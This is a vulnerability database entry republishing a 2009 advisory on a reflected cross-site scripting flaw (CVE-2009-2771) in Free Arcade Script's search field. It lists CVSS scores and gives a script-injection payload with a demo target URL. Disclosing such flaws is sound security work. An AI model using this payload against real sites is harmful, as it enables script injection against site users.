Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Free Arcade Script (search) XSS Vulnerability
2009.08.17
Credit:
null
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2009-2771
CWE:
CWE-79
CVSS Base Score:
4.3/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
None
Integrity impact:
Partial
Availability impact:
None
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ _0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ _0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ _____0______0______0__0______0___0__0________0___0__00000__0___0_ _0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ _________________________________________________________________ # [+] Free Arcade Script (search) XSS vulnerability # [+] Software : Free Arcade Script # [+] Author : 599eme Man # [+] Contact : Flouf@live.fr # [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell... # [+] Special Thanks : Moudi Aka SixSo brozazaaaaaaaaa # [+] Download : http://gscripts.net/free-php-scripts/Aracade_Scripts/Free_Arcade_Script/details.html # #[------------------------------------------------------------------------------------] # # [+] Vulnerability # # [+] XSS # # - http://www.site.com/search/ in input search : '"><script>alert(String.fromCharCode(88,83,83))</script> # # [+] Demo # # - http://www.demo.freearcadescript.net/search/ # #[------------------------------------------------------------------------------------] # ######################################################################################################### # milw0rm.com [2009-07-24]
References:
http://secunia.com/advisories/36025
http://packetstormsecurity.org/0907-exploits/fas-xss.txt
http://osvdb.org/56580
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top